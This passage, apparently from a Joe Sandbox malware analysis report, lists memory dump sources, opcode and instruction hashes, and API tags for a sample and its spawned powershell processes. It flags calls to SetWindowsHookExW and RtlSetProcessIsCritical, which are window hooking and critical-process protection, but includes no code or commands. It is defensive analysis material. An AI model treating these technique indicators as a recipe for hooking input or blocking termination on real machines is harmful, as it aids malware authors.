                                                                  • Opcode Fuzzy Hash: 78da56b4ea0ea925ccfca5ee7c442a4212c3a06010806f896b8afb37bdf51cc7
                                                                  • Instruction Fuzzy Hash: 5FC1C461B1D90E5FEF98F76C84756B97AD2EF9C301F05017AE05EC32E6DE28A9024341

                                                                  Control-flow Graph

                                                                  [Control-flow graph rendering omitted; function at 7ffd9b898e61, calls SetWindowsHookExW]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 8e149019017579ef8b328fb8a68d0d45bd2e1b70cf93c5d24c37b8743d07117f
                                                                  • Instruction ID: f5625dcebce2da45dff5711a8e1b113ebf06d36223d4996679e842744f9de880
                                                                  • Opcode Fuzzy Hash: 8e149019017579ef8b328fb8a68d0d45bd2e1b70cf93c5d24c37b8743d07117f
                                                                  • Instruction Fuzzy Hash: 48712631A0CA5D8FDB19DB68D85AAF97BE1EF59321F00427FD019C3292CB64A842C781

                                                                  Control-flow Graph

                                                                  [Control-flow graph rendering omitted; function at 7ffd9b89892d, calls RtlSetProcessIsCritical]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalProcess
                                                                  • String ID:
                                                                  • API String ID: 2695349919-0
                                                                  • Opcode ID: 334357b9974f026af622feab56e3bfa04b8a010f011e77f9c3c40496bb77489a
                                                                  • Instruction ID: 6506d0ea4c3e9f4527f4b13df4b54a174a718dddd13279f0f452d9e533e4fc59
                                                                  • Opcode Fuzzy Hash: 334357b9974f026af622feab56e3bfa04b8a010f011e77f9c3c40496bb77489a
                                                                  • Instruction Fuzzy Hash: 8D614931908A4D8FCB18DF68C859AE97BF0FF59310F04426FD08AC7192DB35A846CB81

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 8a56bead0db863ba1fa4641017e3275fe0dd597596d064604067da70560b1e31
                                                                  • Instruction ID: f54def3aea782a6cf0897c83efccb7a6c4204bdb0dbc78b956c8af3f6f554822
                                                                  • Opcode Fuzzy Hash: 8a56bead0db863ba1fa4641017e3275fe0dd597596d064604067da70560b1e31
                                                                  • Instruction Fuzzy Hash: 2A512A72B0DA4D4FEB28DBAC9C256B97BE1EF59321F14017FD05DC31A3CA2569428781

                                                                  Control-flow Graph

                                                                  [Control-flow graph rendering omitted; function at 7ffd9b8983c0, calls SetWindowsHookExW]
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2985296589.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_18fvs4AVae.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 9ea8606cde09fa009372cace13ab6cd1b10083c6a9b49bd931a5b9020736bb19
                                                                  • Instruction ID: 77a94391ecfcb211e0bae0d8798c686d1b9becd63c39d25dcb8548d5d90eef04
                                                                  • Opcode Fuzzy Hash: 9ea8606cde09fa009372cace13ab6cd1b10083c6a9b49bd931a5b9020736bb19
                                                                  • Instruction Fuzzy Hash: 7B310931A0CA4C4FEB1CEF5CD8156B97BE1EB59311F00427ED059D3292DA70A8428781
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cb2a0838ef0de51526c4ebf63319d6c3da66bae3dc608907d9a9341cb184171
                                                                  • Instruction ID: d894dec34bfb2e7c588e6bfa3e6e01963948e9601467d0c53df7640ffb1a5dc0
                                                                  • Opcode Fuzzy Hash: 0cb2a0838ef0de51526c4ebf63319d6c3da66bae3dc608907d9a9341cb184171
                                                                  • Instruction Fuzzy Hash: B2C14532B1FA8E1FEBA5ABA848755B57BE0EF51310B0901BED85DC70E7DA18AD05C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d21052d2e694d5660b0f067e9e09559247a38acda7aa60e08483fd05801f8716
                                                                  • Instruction ID: 561fbc565cdb66ae7f6f30d841619bcbcfde0667e0a6d25cec1e62d65e18457b
                                                                  • Opcode Fuzzy Hash: d21052d2e694d5660b0f067e9e09559247a38acda7aa60e08483fd05801f8716
                                                                  • Instruction Fuzzy Hash: DF310C71A1DF4C8FDB189F5C984A6E97BE1FB99310F00412FE45993252DA70A855CBC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f1bf3cd04ffa75b246d5dcae7e68ae381669807eee429ae0572c4c058c15fb0
                                                                  • Instruction ID: 553f8c84b92d8e408595d9be59871f4b026985d6fae4af7c8f69a0efdde1fa1b
                                                                  • Opcode Fuzzy Hash: 5f1bf3cd04ffa75b246d5dcae7e68ae381669807eee429ae0572c4c058c15fb0
                                                                  • Instruction Fuzzy Hash: A421263090CB4C4FDB59DFAC984A7E97BF0EBA6321F04416BD448C3196DA74941ACB92
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800216154.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b76d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                  • Instruction ID: 522c281367f8cd39f184f62ec27b82c0832a8d6d14c9dbd060c0e6522b8ac430
                                                                  • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                                                  • Instruction Fuzzy Hash: E8014F3160CE088F9AA4EF2EE48595237E0FB98320710065AE41DC756AD731F891CBC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8619d5d3d75962e74ff1ffb8351a320bac4c28d42fb0be8bb6902258ee90ee6c
                                                                  • Instruction ID: 7942ddcb7b366def54c675fdc0a42c1b9c7b229ae68d60287c1eb1a1f3edd8da
                                                                  • Opcode Fuzzy Hash: 8619d5d3d75962e74ff1ffb8351a320bac4c28d42fb0be8bb6902258ee90ee6c
                                                                  • Instruction Fuzzy Hash: 9001A73020CB0C4FD748EF0CE451AA6B3E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34c4fb9d294938c82691e40d6b384e2be4deacc55872c278f004643f5f74a914
                                                                  • Instruction ID: a8a743c99361bab1c05fce395610e3906bdc469338ea1036e2773aa2cafd4e81
                                                                  • Opcode Fuzzy Hash: 34c4fb9d294938c82691e40d6b384e2be4deacc55872c278f004643f5f74a914
                                                                  • Instruction Fuzzy Hash: 96F0BE32B4E5098FD7A9EA9CE4519E873E0EF65320B1600BAE06DC72B7CA25EC40C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01b154888f1f3c206bef50cf5dbecda22f418d2fdf3839bb6fa6f4990536d6b1
                                                                  • Instruction ID: dd1e6a92ac3ed16bb6159075bfe773dbda650f7da38fe6f2b115ca486aec9751
                                                                  • Opcode Fuzzy Hash: 01b154888f1f3c206bef50cf5dbecda22f418d2fdf3839bb6fa6f4990536d6b1
                                                                  • Instruction Fuzzy Hash: 05F0BE32A8E5498FD7A8EA9CE0609A873E0FF0532071600BAE05DCB1A7CA25BC40C740
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800937242.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b950000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                                  • Instruction ID: 3802ec5be2d9221bbc0c928bb53893fd5c381f0b2bc07e657ec37962820c2307
                                                                  • Opcode Fuzzy Hash: 213a7bef4350c3f1bee2949e225e7fce9f90476923c174b99f125c2ca0013e85
                                                                  • Instruction Fuzzy Hash: 62E01235505A4D8FDB55DF18C8554E97BA0FF68201B01425BE41DC7161DB719554CBC2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1800581692.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7ffd9b880000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N_^4$N_^7$N_^F$N_^J
                                                                  • API String ID: 0-3508309026
                                                                  • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                  • Instruction ID: 3d73ddd26afee8af5c4e977c855be3ba5e549368567e4c73e868d7912246f78f
                                                                  • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                  • Instruction Fuzzy Hash: B32107B77084358ED30A7BBCBD289D93740DB9423874501B3D2A9CB183E914608786C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df4287ea0a60840170c40f21cce917b4f15806919479ab280dabe8cda0ecacbe
                                                                  • Instruction ID: 81b71b770f79cfa880cf874363d84b16367049834170ccbdbc2a3101db4b4539
                                                                  • Opcode Fuzzy Hash: df4287ea0a60840170c40f21cce917b4f15806919479ab280dabe8cda0ecacbe
                                                                  • Instruction Fuzzy Hash: 7AD19070A18A4D8FDF98DF58C465AE97BE1FF68340F1541AAD40DD72A6CB34E881CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da185dd60ff26320368d5b7d9f58b2eaf931f4bca34c99ee7442e12f66ad2482
                                                                  • Instruction ID: 3550636a8c333136716f678c4dabf38f997d7921475fe11bce6035687f06f318
                                                                  • Opcode Fuzzy Hash: da185dd60ff26320368d5b7d9f58b2eaf931f4bca34c99ee7442e12f66ad2482
                                                                  • Instruction Fuzzy Hash: DED14732A1FB8E9FEBA59BA858655B57BE0EF52310B0901FFD45CC70E3DA18A905C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a197f4d91579542f19a13a199b63c2f54c590804a1e3027bf895c6e8b91a62f3
                                                                  • Instruction ID: 155d1fef54cff487082eecfc54779a98ddea77ffc6039a642fe76e3a5f244ef8
                                                                  • Opcode Fuzzy Hash: a197f4d91579542f19a13a199b63c2f54c590804a1e3027bf895c6e8b91a62f3
                                                                  • Instruction Fuzzy Hash: 3DB13870A1DB4D8FDB58EF68C895AB57BE1EF99310F10017ED08AC31A6DA25F846CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                  • Instruction ID: 96c0ac9101b0ca48e6db44437c2ff1c87884f1fd2b7ab5e85d54977e619b0df1
                                                                  • Opcode Fuzzy Hash: dbba9530308ad645f004afff06599bd9512dccf8347e6862ddd44b971ade6c87
                                                                  • Instruction Fuzzy Hash: E041387190DB884FDB18DF5C9C0A6A87FE1FB99310F04416FE499C3292DA70A905CBC2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898116912.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b77d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb456c58ceffb4b36f2e025bc85931e215ec18726ec6bba4cc5e04eaa96e2e76
                                                                  • Instruction ID: 968f3fb83a6ba1b9fd42c1a4c0579ff0800aa416216f591a456f0687ebff2bcc
                                                                  • Opcode Fuzzy Hash: eb456c58ceffb4b36f2e025bc85931e215ec18726ec6bba4cc5e04eaa96e2e76
                                                                  • Instruction Fuzzy Hash: 6A41247140EBC44FE7669B2898919523FF4EF57220B1A06DFD088CB1B3D629A846C792
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b1bb4d2c1538da357dae119ccfa954c5db61d2dc78202ce7a6a31f608dd5b138
                                                                  • Instruction ID: 6e8ea1eac01fdcb23945219650ca695fbd61f89e3a1a3002510d65d8e3edcb02
                                                                  • Opcode Fuzzy Hash: b1bb4d2c1538da357dae119ccfa954c5db61d2dc78202ce7a6a31f608dd5b138
                                                                  • Instruction Fuzzy Hash: D9F0C83AA1AA8C5FEB91EF1898654E87FA0FF5A211B0502B7D449C7061DA2195488782
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                  • Instruction ID: 0037cf7cd0e8da730bb9c57dfdf167aedc042902d057b13c57502d39fd69f30a
                                                                  • Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                                                  • Instruction Fuzzy Hash: D0F0BE32B0E5098FD769EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC40C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                  • Instruction ID: 71936907c65e5d25e9726e2641dbf7dddf597606121a57d3b6974e27c6721ca6
                                                                  • Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                                                  • Instruction Fuzzy Hash: 0CF0BE32A0E5498FD769EB9CE0619A873E0FF0532071600BAE05DCB1A3CA26AC40C740
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1899665736.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                  • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1898843052.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                  • API String ID: 0-962139525
                                                                  • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                  • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                                                  • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                                  • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2040797010.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b980000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b7a0cd7baf5420a3ba8eea77e88cd5401fff920ff53ae565ab26893f270d6bf
                                                                  • Instruction ID: 2d2efc34c12dd9875a1ca289fdeca1524006620449fd10f8c8618bff1cb7a234
                                                                  • Opcode Fuzzy Hash: 2b7a0cd7baf5420a3ba8eea77e88cd5401fff920ff53ae565ab26893f270d6bf
                                                                  • Instruction Fuzzy Hash: B0D14632A1FECE1FEB659BA858255B57BE1EF52310B0901FED45DCB0E3D928A905C341
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2040797010.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b980000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b0f0f8aab466771aaf18d8adbe260f3a08f5efb3074d93b7d18b8112623d976
                                                                  • Instruction ID: 4847d72f8f87c978778ddf561dad2848a5a065feacfefcf023f97e2ccd620f54
                                                                  • Opcode Fuzzy Hash: 7b0f0f8aab466771aaf18d8adbe260f3a08f5efb3074d93b7d18b8112623d976
                                                                  • Instruction Fuzzy Hash: B781FE22A2FECA2FEBB59BA854755386BD1EF11314B1A01BEC44DCF0E7D928AD058341
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b41c22fa493e82129d8aade42d7c399fa09d160fc8944f471a4de19a4c02da6
                                                                  • Instruction ID: 61d5668e27930ebb09187e21558b0727673603fdab69aadee56b36c3efa74688
                                                                  • Opcode Fuzzy Hash: 5b41c22fa493e82129d8aade42d7c399fa09d160fc8944f471a4de19a4c02da6
                                                                  • Instruction Fuzzy Hash: A9515173E0A5AD5FEF119B6CACB54E53BA0EF1132CB0902B3D4988B0A3FD15261786C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a55989dc951cb66f7d4b5331e5bc4316f1f585661bcb52a97233c5982cc97ed7
                                                                  • Instruction ID: cea387578a5cf14e564f3852fa0de91f7155f671de3aad1876c790f5ce947a13
                                                                  • Opcode Fuzzy Hash: a55989dc951cb66f7d4b5331e5bc4316f1f585661bcb52a97233c5982cc97ed7
                                                                  • Instruction Fuzzy Hash: 99412B71A1DA8C8FDB589F5C985A6F87BE0FB99310F40416FE44C83292DA70B805CBC6
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2038989567.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b79d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8f44720767ab505aa236a0acf5c330c336654f940d9ce7c28ec5ba2a570851bc
                                                                  • Instruction ID: e6d975a8f6997b546761304cf6a436f1843aee731375b271e509957353ed76f8
                                                                  • Opcode Fuzzy Hash: 8f44720767ab505aa236a0acf5c330c336654f940d9ce7c28ec5ba2a570851bc
                                                                  • Instruction Fuzzy Hash: 1041287040EBC44FE7568B289C51A523FF0EF53224B1A06DFD088CB1B3D629A84AC792
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2039890209.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ffd9b8b0000_powershell.jbxd